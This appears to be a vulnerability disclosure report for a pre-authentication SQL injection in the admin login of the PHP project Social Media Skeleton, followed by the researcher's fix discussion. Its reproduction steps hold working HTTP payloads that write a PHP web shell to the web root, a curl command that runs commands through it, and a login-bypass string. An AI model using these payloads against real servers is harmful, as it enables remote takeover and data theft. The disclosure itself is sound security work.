Pre-Auth SQLi leading to RCE in Social Media Skeleton v1.0 in fobybus/social-media-skeleton
Reported on
Aug 1st 2023
Summary
A SQL Injection vulnerability exists in Social Media Skeleton v1.0 via the username and password parameters in admin/login.php. Not to be confused with login.php, which properly escapes special characters.
Issue Description
SQL injection (SQLi) is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution. This particular SQLi vulnerability allows UNION based injections, which indirectly leads to RCE.
Improper authorization in a web application undermines its security by exposing sensitive functionalities and resources to unauthorized users. This particular authorization vulnerability allows an unauthorized user to access this resource. Improper authorization is a pervasive problem throughout this application.
The affected script takes a value via a POST request and eventually concatenates it in a SQL query. admin/login.php line 4-5
$uemail=$_POST["email"];
$upass=$_POST["password"];
This value is parsed as an array which can be manipulated to contain a malicious payload sell_return.php lines 8-9
$query="select * from admin where email='$uemail' and password='$upass'";
$result=mysqli_query($dbcon,$query);
Affected URL/Area
<host>/social-media-skeleton/admin/login.php
Risk Rating
- Risk: HIGH
- Difficulty to Exploit: LOW
CVSS Justification
Network
The vulnerable component is bound to the network stack. The set of possible attackers extends beyond local attacks, up to and including the entire Internet. This kind of vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers).
Low
Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component.
None
The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the the vulnerable system to carry out an attack.
None
The vulnerable system can be exploited without interaction from any user.
Changed
An exploited vulnerability can affect resources beyond the security scope managed by the security authority of the vulnerable component.
High
There is a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker.
High
There is a total loss of data integrity.
High
There is a total loss of availability.
Steps to reproduce
Attacker makes this request
POST /social-media-skeleton/admin/login.php HTTP/1.1
Host: localhost
Content-Length: 124
Content-Type: application/x-www-form-urlencoded
email=1' UNION SELECT '<?php system($_GET["cmd"]); ?>','','' INTO OUTFILE 'C:\\xampp\\htdocs\\rce.php' -- &password=anything
Or this request:
POST /social-media-skeleton/admin/login.php HTTP/1.1
Host: localhost
Content-Length: 118
Content-Type: application/x-www-form-urlencoded
email=1&password=1' UNION SELECT '<?php system($_GET["cmd"]); ?>','','' INTO OUTFILE 'C:\\xampp\\htdocs\\rce.php' --
Should now be able to use the malicious PHP script to execute commands.
curl http://localhost/rce.php?cmd=whoami
Affected Demographic/User Base
Any users of this service for their social media are at risk of having their data stolen, manipulated, or destroyed. The host of this server is at risk of system compromise.
Recommended Fix
Do not pass user controlled data to SQL queries. Use prepared statements or parameterized queries instead.
Note
For the issued CVE ID, please credit Michael Blunt as the discovering researcher. List contact email as michael@mik.bz. The author of this project has been contacted and this information has been shared.
Impact
Attack Scenario
An attacker who finds this system can forge a request to the admin/login.php endpoint and create a malicious PHP file. This PHP file can do anything the attacker wants within the confines of the server settings. This can result in remote code execution (RCE) and full control over the affected resource. Additionally, the attacker can call a reverse shell with the permissions of the user running the webapp.
This is a UNION based injection attack, but more generally in the class of SQL injections: Attackers can use these types of attacks to modify, add, or delete data from the remote database.
The attacker could also use this attack to log in as an administrator with the payload:
username=1' OR '1=1' -- &password=anything
Occurrences
SECURITY.md
2 months ago
Great work @mblunt 👌 Could you kindly propose/submit a fix for this vulnerability? Any help is appreciated.
Sure thing! I noticed that there were other instances of SQli throughout the codebase so I have updated them to use parameterized queries. Updated files: social-media-skeleton/admin/atask/add.php social-media-skeleton/admin/atask/setting.php social-media-skeleton/admin/login.php social-media-skeleton/tasks/updatels.php
Also a note about mysql_real_escape_string(). It is generally ok, and will prevent most attackers. However, it is not bulletproof. It can be bypassed in some weird edge cases, which is why parameterized queries are recommend practice.
I did not change the exisiting mysql_real_escape_string() in some files, like social-media-skeleton/login.php or social-media-skeleton/signup.php. The current implementation in these files is not vulnerable, but its worth mentioning for a possible improvement.
Hope this helps!